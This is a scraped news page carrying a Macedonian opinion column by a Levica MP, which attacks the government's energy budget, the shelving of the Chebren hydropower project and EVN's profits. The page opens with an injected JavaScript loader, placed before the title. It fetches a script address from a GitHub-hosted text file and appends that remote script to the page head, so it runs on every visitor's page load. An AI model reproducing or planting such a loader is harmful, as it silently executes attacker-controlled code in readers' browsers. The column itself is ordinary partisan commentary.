;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Енергетика како одраз на политичка амнезија - Антропол
АктуелноЛокалноСтав

Енергетика како одраз на политичка амнезија

Став на Амар Мециновиќ, пратеник од Левица:

Републичкиот буџет за идната година ќе го краси голема нула за Чебрен и смешни цифри за гасификација. За власта, чиј кормилар е човек од енергетскиот сектор и чии најблиски соработници и министри делат слична дејност со него – која отвори ново посебно министерство за енергетика, интуицијата вели дека главниот фокус ќе биде развивањето на енергетските капацитети и независност на државата. Но, првиот буџет што го изготвија ни отсликува поинаква реалност, многу повеќе прикладна на досегашната македонска политичка пракса. Целиот циркус на министерството за енергетика и она за финансии со кое диригира маестро Мицкоски ни покажа дека наместо независност и развој, целта е уште подлабоко забивање на канџите на приватниот енергетски интерес во сè понеизвесната иднина на Македонија.

Општеството чии институции го водат врти-капи со променлива самосвест, наметнува прашање „зошто?“, кое е повеќе од реторика во овој случај. Тоа е симптом на колективна амнезија, каде што личните интереси и станбени портфолија низ Европа имаат предност пред општото добро. Пред грејната сезона, нашата клучна фигура во ревитализацијата на македонскиот електроенергетски систем може да ни понуди хулахопки, но не и план за вистинските предизвици во секторот. Во буџетот, меѓу редови е испишано со големи црвени букви: нема систем – има интереси.

Политиката на енергетски ваучери

Наместо инвестиции во стратешки проекти како Чебрен или гасификација, народот се „усреќува“ со ваучери за инвертер клими. Една краткорочна предигра што ја маскира суштинската некомпетентност. Во исто време, буџетот од 2025 година е насочен кон проекти што не служат на енергетската независност, туку на профитот на странските инвеститори. Премиерот, математички прецизен во личните калкулации, продолжува да го поддржува растот на приватните когенеративни централи, додека јавните енергетски капацитети тонат во долгови.

Во 2023 година, ЕВН Македонија остварува добивка од 28 милиони евра, што во споредба со 2022 г. означува раст од 546%. ЕВН Хоум остварува добивка во 2023 г. од 20,8 милиони евра, со раст на годишно ниво од 129%. Според Министерството за финансии, заклучно со месец септември 2024 г., АД Електрани на Северна Македонија во државна сопственост има доспеан, а ненаплатен долг од 4.426.840.065 денари и недоспеан долг Т, Т+1 и Т+2 во вкупна вредност од 5.747.525.935 денари или вкупен долг ,според Министерство за финансии, од 10.174.366.000 денари, т.е. долг од 165.436. 845 евра. ЕСМ производство на топлинска енергија, според Министерството за финансии, заклучно со септември 2024 г., има вкупен доспеан и недоспеан долг од 510. 522.167 денари, т.е. долг од 8.301.173 денари.

Во една парадигма каде што регулаторните тела како РКЕ се тивки соучесници, дозволата за изградба на 900MW фотоволтаици се трансформира во „бизнис со пријателите“. Народот ќе продолжи да плаќа за пристап до мрежата, а ЕВН ќе трие раце со добивка што ја надминува и најоптимистичката прогноза. Како во некоја иронична претстава, дури и ако сите осигурувачи бидат спуштени, ЕВН ќе продолжи да заработува на празни броила. Преку мрежарината што ја воведе Бислимовски, кој ги преживува сите трансфери на власт, ЕВН годишно заработува речиси 24 милиони евра само затоа што постои.

„Чебрен“: Ветено, но заборавено

Најголемата трагедија не е тоа што Чебрен не се гради, туку што никој не сака да го гради. Со години слушаме за важноста на хидропотенцијалот, но тој останува само на хартија. Во меѓувреме, долговите на државните компании како ЕСМ и МЕПСО растат експоненцијално, додека приватните инвеститори профитираат. За народот остануваат само сметки за струја како новогодишна честитка, а за политичките елити – нови станбени квадрати низ Европа.

Премиерот, како и за многу други работи во неговата политичка кариера, има бројни изјави каде наговестува приоритетизација на државна изградба на Чебрен што не можат да се толкуваат двосмислено. Недостатокот на конфузија во изјавите, или барем простор за различна интерпретација ни посочува кон една од две можности. Премиерот ветуваше нешто што знае дека народот го сака и е потребено за државата, знаејќи дека нема да испорача, или пак под притисок на енергетската олигархија ретерираше од овие позиции. Веројатноста за нечесност на премиерот е поголема доколку увидиме дека и тој самиот припаѓа на оваа интересна група од втората опција на развој на настаните.

Од симптом до дијагноза

Да, струјата ќе поскапи и Чебрен нема да се гради, бидејќи за Чебрен нема ни денар во буџетот. Екпертите за енергетика можеа, но не сакаа Чебрен да се изгради како државен капацитет во рок од 10 години. Можеа, но не сакаа годишно од буџетот на Република Македонија да се одвојуваат по 100 милиони евра, крајно за енергетска независнот. Го градиме ли Чебрен ние – ќе има за народот, со приватни централи и фотоволтаици – ќе има за нив: за олигарсите, за Божиновска, за Бислимовски и за Мицковски. За народот следат само поскапи сметки за струја како редовна новогодишна честитка на РКЕ.

Додека ги гласаме, плаќаме и за нивните адвокати кои им ја одредуваат националната самосвест – а преку енергетиката во Македонија ќе ја создаваме сликата на нашето општество. Кога тие што се на власт гледаат на ресурсите како на лична банкомат-карта, кога регулаторите работат за олигарсите, а народот плаќа за привилегиите на малкумина – тогаш дијагнозата е јасна. Но, прашањето што останува е: дали оваа дијагноза ќе се претвори во лекција или само во уште еден преседан?

Извор: Плоштад